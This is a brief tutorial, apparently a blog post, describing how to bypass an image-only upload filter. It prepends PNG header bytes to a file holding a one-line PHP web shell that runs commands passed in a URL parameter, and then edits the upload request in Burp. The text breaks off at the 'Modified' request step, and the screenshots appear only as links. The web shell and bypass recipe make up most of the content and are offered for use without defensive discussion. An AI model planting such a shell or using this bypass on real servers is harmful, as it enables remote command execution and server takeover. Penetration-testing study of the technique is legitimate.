Filter Upload Bypassing Reverse Shell With A PNG

1 min readJul 13, 2024

Filter Upload Bypassing Reverse Shell With A PNG

Scenario you have a place to upload files that you can access, but there is a filter making sure that the
file type matches the ones expected (e.g. only image file types)

PNG Image Header
89 50 4E 47

Open a hex editor and create a new file, copy those bytes over to the beginning of the new file. Into the
TEXT area (on the right, not the bytes area where you just pasted the header above) paste your shell

<?php system($_GET[‘c’]);?>

It should look like this

https://i.ibb.co/JFsThwN/Screenshot-2024-05-30-at-20-11-09-File-Upload-Filter-Bypass-pdf.png

Take note of the length

https://i.ibb.co/9vWymtc/Screenshot-2024-05-30-at-20-12-59-File-Upload-Filter-Bypass-pdf.png
Next start burp and navigate to the upload directory.

Then do the following

1. Turn on interceptor

2. Send an upload request with any file

3. Modify the request

Original

https://i.ibb.co/1fMyGpv/Screenshot-2024-05-30-at-20-14-44-File-Upload-Filter-Bypass-pdf.png

Modified